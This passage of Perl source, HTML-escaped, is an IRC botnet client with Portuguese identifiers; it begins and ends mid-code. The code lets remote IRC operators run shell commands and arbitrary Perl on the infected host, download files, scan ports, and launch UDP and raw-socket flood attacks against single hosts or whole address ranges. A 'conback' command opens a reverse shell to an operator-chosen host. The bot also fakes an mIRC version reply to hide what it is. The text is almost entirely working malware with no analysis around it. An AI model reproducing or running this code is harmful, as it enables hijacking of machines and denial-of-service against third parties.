{&lt;br /&gt;     sendraw(&amp;quot;PONG :$1&amp;quot;);&lt;br /&gt;   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {&lt;br /&gt;       my $pn=$1; my $onde = $4; my $args = $5;&lt;br /&gt;       if ($args =~ /^\001VERSION\001$/) {&lt;br /&gt;         notice(&amp;quot;$pn&amp;quot;, &amp;quot;\001VERSION mIRC v6.16 Khaled Mardam-Bey\001&amp;quot;);&lt;br /&gt;       }&lt;br /&gt;       elsif ($args =~ /^\001PING\s+(\d+)\001$/) {&lt;br /&gt;         notice(&amp;quot;$pn&amp;quot;, &amp;quot;\001PONG\001&amp;quot;);&lt;br /&gt;       }&lt;br /&gt;       elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {&lt;br /&gt;         if ($onde eq &amp;quot;$meunick&amp;quot;){&lt;br /&gt;           shell(&amp;quot;$pn&amp;quot;, &amp;quot;$args&amp;quot;);&lt;br /&gt;         }&lt;br /&gt;         elsif ($args =~ /^(\Q$meunick\E&amp;#124;\Q$prefixo\E)\s+(.*)/ ) {&lt;br /&gt;            my $natrix = $1;&lt;br /&gt;            my $arg = $2;&lt;br /&gt;            if ($arg =~ /^\!(.*)/) {&lt;br /&gt;              ircase(&amp;quot;$pn&amp;quot;,&amp;quot;$onde&amp;quot;,&amp;quot;$1&amp;quot;) unless ($natrix eq &amp;quot;$prefixo&amp;quot; and $arg =~ /^\!nick/);&lt;br /&gt;            } elsif ($arg =~ /^\@(.*)/) {&lt;br /&gt;                $ondep = $onde;&lt;br /&gt;                $ondep = $pn if $onde eq $meunick;&lt;br /&gt;                bfunc(&amp;quot;$ondep&amp;quot;,&amp;quot;$1&amp;quot;);&lt;br /&gt;            } else {&lt;br /&gt;                shell(&amp;quot;$onde&amp;quot;, &amp;quot;$arg&amp;quot;);&lt;br /&gt;            }&lt;br /&gt;         }&lt;br /&gt;       }&lt;br /&gt;   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {&lt;br /&gt;       if (lc($1) eq lc($meunick)) {&lt;br /&gt;         $meunick=$4;&lt;br /&gt;         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;&lt;br /&gt;       }&lt;br /&gt;   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {&lt;br /&gt;       $meunick = getnick();&lt;br /&gt;       nick(&amp;quot;$meunick&amp;quot;);&lt;br /&gt;   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {&lt;br /&gt;       $meunick = $2;&lt;br /&gt;       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;&lt;br /&gt;       $irc_servers{$IRC_cur_socket}{'nome'} = &amp;quot;$1&amp;quot;;&lt;br /&gt;       foreach my $canal (@canais) {&lt;br /&gt;         sendraw(&amp;quot;JOIN $canal die&amp;quot;);&lt;br /&gt;       }&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub bfunc {&lt;br /&gt;  my $printl = $_[0];&lt;br /&gt;  my $funcarg = $_[1];&lt;br /&gt;  if (my $pid = fork) {&lt;br /&gt;     waitpid($pid, 0);&lt;br /&gt;  } else {&lt;br /&gt;      if (fork) {&lt;br /&gt;         exit;&lt;br /&gt;       } else {&lt;br /&gt;           if ($funcarg =~ /^portscan (.*)/) {&lt;br /&gt;             my $hostip=&amp;quot;$1&amp;quot;;&lt;br /&gt;             my @portas=(&amp;quot;21&amp;quot;,&amp;quot;22&amp;quot;,&amp;quot;23&amp;quot;,&amp;quot;25&amp;quot;,&amp;quot;53&amp;quot;,&amp;quot;80&amp;quot;,&amp;quot;110&amp;quot;,&amp;quot;143&amp;quot;);&lt;br /&gt;             my (@aberta, %porta_banner);&lt;br /&gt;             foreach my $porta (@portas)  {&lt;br /&gt;                my $scansock = IO::Socket::INET-&amp;gt;new(PeerAddr =&amp;gt; $hostip, PeerPort =&amp;gt; $porta, Proto =&amp;gt; 'tcp', Timeout =&amp;gt; 4);&lt;br /&gt;                if ($scansock) {&lt;br /&gt;                   push (@aberta, $porta);&lt;br /&gt;                   $scansock-&amp;gt;close;&lt;br /&gt;                }&lt;br /&gt;             }&lt;br /&gt;             if (@aberta) {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :Portas abertas: @aberta&amp;quot;);&lt;br /&gt;             } else {&lt;br /&gt;                 sendraw($IRC_cur_socket,&amp;quot;PRIVMSG $printl :Nenhuma porta aberta foi encontrada.&amp;quot;);&lt;br /&gt;             }&lt;br /&gt;           }&lt;br /&gt;&lt;br /&gt;           elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {&lt;br /&gt;            getstore(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;);&lt;br /&gt;            sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :Download de $2 ($1) Conclu?do!&amp;quot;) if ($estatisticas);&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;           elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {&lt;br /&gt;             my $hostname=&amp;quot;$1&amp;quot;;&lt;br /&gt;             my $portainicial = &amp;quot;$2&amp;quot;;&lt;br /&gt;             my $portafinal = &amp;quot;$3&amp;quot;;&lt;br /&gt;             my (@abertas, %porta_banner);&lt;br /&gt;             foreach my $porta ($portainicial..$portafinal)&lt;br /&gt;             {&lt;br /&gt;               my $scansock = IO::Socket::INET-&amp;gt;new(PeerAddr =&amp;gt; $hostname, PeerPort =&amp;gt; $porta, Proto =&amp;gt; 'tcp', Timeout =&amp;gt; 4);&lt;br /&gt;               if ($scansock) {&lt;br /&gt;                 push (@abertas, $porta);&lt;br /&gt;                 $scansock-&amp;gt;close;&lt;br /&gt;                 if ($estatisticas) {&lt;br /&gt;                   sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :Porta $porta aberta em $hostname&amp;quot;);&lt;br /&gt;                 }&lt;br /&gt;               }&lt;br /&gt;             }&lt;br /&gt;             if (@abertas) {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :Portas abertas: @abertas&amp;quot;);&lt;br /&gt;             } else {&lt;br /&gt;               sendraw($IRC_cur_socket,&amp;quot;PRIVMSG $printl :Nenhuma porta aberta foi encontrada.&amp;quot;);&lt;br /&gt;             }&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;            # Duas Vers?es simplificada do meu Tr0x ;D&lt;br /&gt;            elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {&lt;br /&gt;              return unless $pacotes;&lt;br /&gt;              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);&lt;br /&gt;              my $alvo=inet_aton(&amp;quot;$1&amp;quot;);&lt;br /&gt;              my $porta = &amp;quot;$2&amp;quot;;&lt;br /&gt;              my $tempo = &amp;quot;$3&amp;quot;;&lt;br /&gt;              my $pacote;&lt;br /&gt;              my $pacotese;&lt;br /&gt;              my $fim = time + $tempo;&lt;br /&gt;              my $pacota = 1;&lt;br /&gt;              while (($pacota == &amp;quot;1&amp;quot;) &amp;amp;&amp;amp; ($pacotes == &amp;quot;1&amp;quot;)) {&lt;br /&gt;                $pacota = 0 if ((time &amp;gt;= $fim) &amp;amp;&amp;amp; ($tempo != &amp;quot;0&amp;quot;));&lt;br /&gt;                $pacote=$rand x $rand x $rand;&lt;br /&gt;                $porta = int(rand 65000) +1 if ($porta == &amp;quot;0&amp;quot;);&lt;br /&gt;                send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == &amp;quot;1&amp;quot;);&lt;br /&gt;              }&lt;br /&gt;              if ($estatisticas)&lt;br /&gt;              {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo&amp;quot;.&amp;quot;s&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Total de Pacotes\002: $pacotese&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Alvo dos Pacotes\002: $1&amp;quot;);&lt;br /&gt;              }&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;            elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {&lt;br /&gt;              return unless $pacotes;&lt;br /&gt;              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);&lt;br /&gt;              my $faixaip=&amp;quot;$1&amp;quot;;&lt;br /&gt;              my $porta = &amp;quot;$2&amp;quot;;&lt;br /&gt;              my $tempo = &amp;quot;$3&amp;quot;;&lt;br /&gt;              my $pacote;&lt;br /&gt;              my $pacotes;&lt;br /&gt;              my $fim = time + $tempo;&lt;br /&gt;              my $pacota = 1;&lt;br /&gt;              my $alvo;&lt;br /&gt;              while ($pacota == &amp;quot;1&amp;quot;) {&lt;br /&gt;                $pacota = 0 if ((time &amp;gt;= $fim) &amp;amp;&amp;amp; ($tempo != &amp;quot;0&amp;quot;));&lt;br /&gt;                for (my $faixa = 1; $faixa &amp;lt;= 255; $faixa++) {&lt;br /&gt;                  $alvo = inet_aton(&amp;quot;$faixaip.$faixa&amp;quot;);&lt;br /&gt;                  $pacote=$rand x $rand x $rand;&lt;br /&gt;                  $porta = int(rand 65000) +1 if ($porta == &amp;quot;0&amp;quot;);&lt;br /&gt;                  send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == &amp;quot;1&amp;quot;);&lt;br /&gt;                  if ($faixa &amp;gt;= 255) {&lt;br /&gt;                    $faixa = 1;&lt;br /&gt;                  }&lt;br /&gt;                }&lt;br /&gt;              }&lt;br /&gt;              if ($estatisticas)&lt;br /&gt;              {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo&amp;quot;.&amp;quot;s&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Total de Pacotes\002: $pacotese&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo&amp;quot;);&lt;br /&gt;              }&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p&lt;br /&gt;            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {&lt;br /&gt;              my $host = &amp;quot;$1&amp;quot;;&lt;br /&gt;              my $porta = &amp;quot;$2&amp;quot;;&lt;br /&gt;              my $proto = getprotobyname('tcp');&lt;br /&gt;              my $iaddr = inet_aton($host);&lt;br /&gt;              my $paddr = sockaddr_in($porta, $iaddr);&lt;br /&gt;              my $shell = &amp;quot;/bin/sh -i&amp;quot;;&lt;br /&gt;              if ($^O eq &amp;quot;MSWin32&amp;quot;) {&lt;br /&gt;                $shell = &amp;quot;cmd.exe&amp;quot;;&lt;br /&gt;              }&lt;br /&gt;              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die &amp;quot;socket: $!&amp;quot;;&lt;br /&gt;              connect(SOCKET, $paddr) or die &amp;quot;connect: $!&amp;quot;;&lt;br /&gt;              open(STDIN, &amp;quot;&amp;gt;&amp;amp;SOCKET&amp;quot;);&lt;br /&gt;              open(STDOUT, &amp;quot;&amp;gt;&amp;amp;SOCKET&amp;quot;);&lt;br /&gt;              open(STDERR, &amp;quot;&amp;gt;&amp;amp;SOCKET&amp;quot;);&lt;br /&gt;              system(&amp;quot;$shell&amp;quot;);&lt;br /&gt;              close(STDIN);&lt;br /&gt;              close(STDOUT);&lt;br /&gt;              close(STDERR);&lt;br /&gt;&lt;br /&gt;              if ($estatisticas)&lt;br /&gt;              {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Conectando-se em\002: $host:$porta&amp;quot;);&lt;br /&gt;              }&lt;br /&gt;            }&lt;br /&gt;&lt;br /&gt;           elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {&lt;br /&gt;            return unless $pacotes;&lt;br /&gt;             my ($dtime, %pacotes) = attacker(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;, &amp;quot;$3&amp;quot;);&lt;br /&gt;             $dtime = 1 if $dtime == 0;&lt;br /&gt;             my %bytes;&lt;br /&gt;             $bytes{igmp} = $2 * $pacotes{igmp};&lt;br /&gt;             $bytes{icmp} = $2 * $pacotes{icmp};&lt;br /&gt;             $bytes{o} = $2 * $pacotes{o};&lt;br /&gt;             $bytes{udp} = $2 * $pacotes{udp};&lt;br /&gt;             $bytes{tcp} = $2 * $pacotes{tcp};&lt;br /&gt;             unless ($estatisticas)&lt;br /&gt;             {&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002 - Status GERAL -\002&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Tempo\002: $dtime&amp;quot;.&amp;quot;s&amp;quot;);&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Total pacotes\002: &amp;quot;.($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002Total bytes\002: &amp;quot;.($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));&lt;br /&gt;               sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :\002M?dia de envio\002: &amp;quot;.int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + &lt;br /&gt;$bytes{o})/1024)/$dtime).&amp;quot; kbps&amp;quot;);&lt;br /&gt;             }&lt;br /&gt;           }&lt;br /&gt;           exit;&lt;br /&gt;       }&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub ircase {&lt;br /&gt;  my ($kem, $printl, $case) = @_;&lt;br /&gt;&lt;br /&gt;   if ($case =~ /^join (.*)/) {&lt;br /&gt;     j(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^part (.*)/) {&lt;br /&gt;      p(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^rejoin\s+(.*)/) {&lt;br /&gt;      my $chan = $1;&lt;br /&gt;      if ($chan =~ /^(\d+) (.*)/) {&lt;br /&gt;        for (my $ca = 1; $ca &amp;lt;= $1; $ca++ ) {&lt;br /&gt;          p(&amp;quot;$2&amp;quot;);&lt;br /&gt;          j(&amp;quot;$2&amp;quot;);&lt;br /&gt;        }&lt;br /&gt;      } else {&lt;br /&gt;          p(&amp;quot;$chan&amp;quot;);&lt;br /&gt;          j(&amp;quot;$chan&amp;quot;);&lt;br /&gt;      }&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^op/) {&lt;br /&gt;      op(&amp;quot;$printl&amp;quot;, &amp;quot;$kem&amp;quot;) if $case eq &amp;quot;op&amp;quot;;&lt;br /&gt;      my $oarg = substr($case, 3);&lt;br /&gt;      op(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;) if ($oarg =~ /(\S+)\s+(\S+)/);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^deop/) {&lt;br /&gt;      deop(&amp;quot;$printl&amp;quot;, &amp;quot;$kem&amp;quot;) if $case eq &amp;quot;deop&amp;quot;;&lt;br /&gt;      my $oarg = substr($case, 5);&lt;br /&gt;      deop(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;) if ($oarg =~ /(\S+)\s+(\S+)/);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^voice/) {&lt;br /&gt;      voice(&amp;quot;$printl&amp;quot;, &amp;quot;$kem&amp;quot;) if $case eq &amp;quot;voice&amp;quot;;&lt;br /&gt;      $oarg = substr($case, 6);&lt;br /&gt;      voice(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;) if ($oarg =~ /(\S+)\s+(\S+)/);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^devoice/) {&lt;br /&gt;      devoice(&amp;quot;$printl&amp;quot;, &amp;quot;$kem&amp;quot;) if $case eq &amp;quot;devoice&amp;quot;;&lt;br /&gt;      $oarg = substr($case, 8);&lt;br /&gt;      devoice(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;) if ($oarg =~ /(\S+)\s+(\S+)/);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^msg\s+(\S+) (.*)/) {&lt;br /&gt;      msg(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {&lt;br /&gt;      for (my $cf = 1; $cf &amp;lt;= $1; $cf++) {&lt;br /&gt;        msg(&amp;quot;$2&amp;quot;, &amp;quot;$3&amp;quot;);&lt;br /&gt;      }&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {&lt;br /&gt;      for (my $cf = 1; $cf &amp;lt;= $1; $cf++) {&lt;br /&gt;        ctcp(&amp;quot;$2&amp;quot;, &amp;quot;$3&amp;quot;);&lt;br /&gt;      }&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {&lt;br /&gt;      ctcp(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^invite\s+(\S+) (.*)/) {&lt;br /&gt;      invite(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^nick (.*)/) {&lt;br /&gt;      nick(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {&lt;br /&gt;       conectar(&amp;quot;$2&amp;quot;, &amp;quot;$1&amp;quot;, 6667);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {&lt;br /&gt;      DCC::SEND(&amp;quot;$1&amp;quot;, &amp;quot;$2&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^raw (.*)/) {&lt;br /&gt;      sendraw(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^eval (.*)/) {&lt;br /&gt;      eval &amp;quot;$1&amp;quot;;&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {&lt;br /&gt;    sleep int(rand($2));&lt;br /&gt;    j(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {&lt;br /&gt;    sleep int(rand($2));&lt;br /&gt;    p(&amp;quot;$1&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^sair/) {&lt;br /&gt;     quit();&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^novonick/) {&lt;br /&gt;    my $novonick = getnick();&lt;br /&gt;     nick(&amp;quot;$novonick&amp;quot;);&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^estatisticas (.*)/) {&lt;br /&gt;     if ($1 eq &amp;quot;on&amp;quot;) {&lt;br /&gt;      $estatisticas = 1;&lt;br /&gt;      msg(&amp;quot;$printl&amp;quot;, &amp;quot;Estat?sticas ativadas!&amp;quot;);&lt;br /&gt;     } elsif ($1 eq &amp;quot;off&amp;quot;) {&lt;br /&gt;      $estatisticas = 0;&lt;br /&gt;      msg(&amp;quot;$printl&amp;quot;, &amp;quot;Estat?sticas desativadas!&amp;quot;);&lt;br /&gt;     }&lt;br /&gt;   }&lt;br /&gt;   elsif ($case =~ /^pacotes (.*)/) {&lt;br /&gt;     if ($1 eq &amp;quot;on&amp;quot;) {&lt;br /&gt;      $pacotes = 1;&lt;br /&gt;      msg(&amp;quot;$printl&amp;quot;, &amp;quot;Pacotes ativados!&amp;quot;) if ($estatisticas == &amp;quot;1&amp;quot;);&lt;br /&gt;     } elsif ($1 eq &amp;quot;off&amp;quot;) {&lt;br /&gt;      $pacotes = 0;&lt;br /&gt;      msg(&amp;quot;$printl&amp;quot;, &amp;quot;Pacotes desativados!&amp;quot;) if ($estatisticas == &amp;quot;1&amp;quot;);&lt;br /&gt;     }&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;sub shell {&lt;br /&gt;  return unless $acessoshell;&lt;br /&gt;  my $printl=$_[0];&lt;br /&gt;  my $comando=$_[1];&lt;br /&gt;  if ($comando =~ /cd (.*)/) {&lt;br /&gt;    chdir(&amp;quot;$1&amp;quot;) &amp;#124;&amp;#124; msg(&amp;quot;$printl&amp;quot;, &amp;quot;Diret?rio inexistente!&amp;quot;);&lt;br /&gt;    return;&lt;br /&gt;  }&lt;br /&gt;  elsif ($pid = fork) {&lt;br /&gt;     waitpid($pid, 0);&lt;br /&gt;  } else {&lt;br /&gt;      if (fork) {&lt;br /&gt;         exit;&lt;br /&gt;       } else {&lt;br /&gt;           my @resp=`$comando 2&amp;gt;&amp;amp;1 3&amp;gt;&amp;amp;1`;&lt;br /&gt;           my $c=0;&lt;br /&gt;           foreach my $linha (@resp) {&lt;br /&gt;             $c++;&lt;br /&gt;             chop $linha;&lt;br /&gt;             sendraw($IRC_cur_socket, &amp;quot;PRIVMSG $printl :$linha&amp;quot;);&lt;br /&gt;             if ($c &amp;gt;= &amp;quot;$linas_max&amp;quot;) {&lt;br /&gt;               $c=0;&lt;br /&gt;               sleep $sleep;&lt;br /&gt;             }&lt;br /&gt;           }&lt;br /&gt;           exit;&lt;br /&gt;       }&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki&lt;br /&gt;sub attacker {&lt;br /&gt;  my $iaddr = inet_aton($_[0]);&lt;br /&gt;  my $msg = 'B' x $_[1];&lt;br /&gt;  my $ftime = $_[2];&lt;br /&gt;  my $cp = 0;&lt;br /&gt;  my (%pacotes);&lt;br /&gt;  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;&lt;br /&gt;&lt;br /&gt;  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;&lt;br /&gt;  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;&lt;br /&gt;  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;&lt;br /&gt;  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;&lt;br /&gt;  return(undef) if $cp == 4;&lt;br /&gt;  my $itime = time;&lt;br /&gt;  my ($cur_time);&lt;br /&gt;  while ( 1 ) {&lt;br /&gt;     for (my $porta = 1; $porta &amp;lt;= 65535; $porta++) {&lt;br /&gt;       $cur_time = time - $itime;&lt;br /&gt;       last if $cur_time &amp;gt;= $ftime;&lt;br /&gt;       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);&lt;br /&gt;       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);&lt;br /&gt;       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);&lt;br /&gt;       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);&lt;br /&gt;&lt;br /&gt;       # DoS ?? :P&lt;br /&gt;       for (my $pc = 3; $pc &amp;lt;= 255;$pc++) {&lt;br /&gt;         next if $pc == 6;&lt;br /&gt;         $cur_time = time - $itime;&lt;br /&gt;         last if $cur_time &amp;gt;= $ftime;&lt;br /&gt;         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;&lt;br /&gt;         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);&lt;br /&gt;       }&lt;br /&gt;     }&lt;br /&gt;     last if $cur_time &amp;gt;= $ftime;&lt;br /&gt;  }&lt;br /&gt;  return($cur_time, %pacotes);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#############&lt;br /&gt;#  ALIASES  #&lt;br /&gt;#############&lt;br /&gt;&lt;br /&gt;sub action {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;PRIVMSG $_[0] :\001ACTION $_[1]\001&amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub ctcp {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;PRIVMSG $_[0] :\001$_[1]\001&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub msg {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;PRIVMSG $_[0] :$_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub notice {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;NOTICE $_[0] :$_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub op {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] +o $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub deop {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] -o $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub hop {&lt;br /&gt;    return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] +h $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub dehop {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] +h $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub voice {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] +v $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub devoice {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] -v $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub ban {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] +b $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub unban {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] -b $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub kick {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;KICK $_[0] $_[1] :$_[2]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub modo {&lt;br /&gt;   return unless $#_ == 0;&lt;br /&gt;   sendraw(&amp;quot;MODE $_[0] $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub mode { modo(@_); }&lt;br /&gt;&lt;br /&gt;sub j { &amp;amp;join(@_); }&lt;br /&gt;sub join {&lt;br /&gt;   return unless $#_ == 0;&lt;br /&gt;   sendraw(&amp;quot;JOIN $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub p { part(@_); }&lt;br /&gt;sub part {sendraw(&amp;quot;PART $_[0]&amp;quot;);}&lt;br /&gt;&lt;br /&gt;sub nick {&lt;br /&gt;  return unless $#_ == 0;&lt;br /&gt;  sendraw(&amp;quot;NICK $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub invite {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;INVITE $_[1] $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub topico {&lt;br /&gt;   return unless $#_ == 1;&lt;br /&gt;   sendraw(&amp;quot;TOPIC $_[0] $_[1]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub topic { topico(@_); }&lt;br /&gt;&lt;br /&gt;sub whois {&lt;br /&gt;  return unless $#_ == 0;&lt;br /&gt;  sendraw(&amp;quot;WHOIS $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub who {&lt;br /&gt;  return unless $#_ == 0;&lt;br /&gt;  sendraw(&amp;quot;WHO $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub names {&lt;br /&gt;  return unless $#_ == 0;&lt;br /&gt;  sendraw(&amp;quot;NAMES $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub away {&lt;br /&gt;  sendraw(&amp;quot;AWAY $_[0]&amp;quot;);&lt;br /&gt;}&lt;br /&gt;sub back { away(); }&lt;br /&gt;sub quit {&lt;br /&gt;  sendraw(&amp;quot;QUIT :$_[0]&amp;quot;);&lt;br /&gt;  exit;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;# DCC&lt;br /&gt;package DCC;&lt;br /&gt;&lt;br /&gt;sub connections {&lt;br /&gt;   my @ready = $dcc_sel-&amp;gt;can_read(1);&lt;br /&gt;#   return unless (@ready);&lt;br /&gt;   foreach my $fh (@ready) {&lt;br /&gt;     my $dcctipo = $DCC{$fh}{tipo};&lt;br /&gt;     my $arquivo = $DCC{$fh}{arquivo};&lt;br 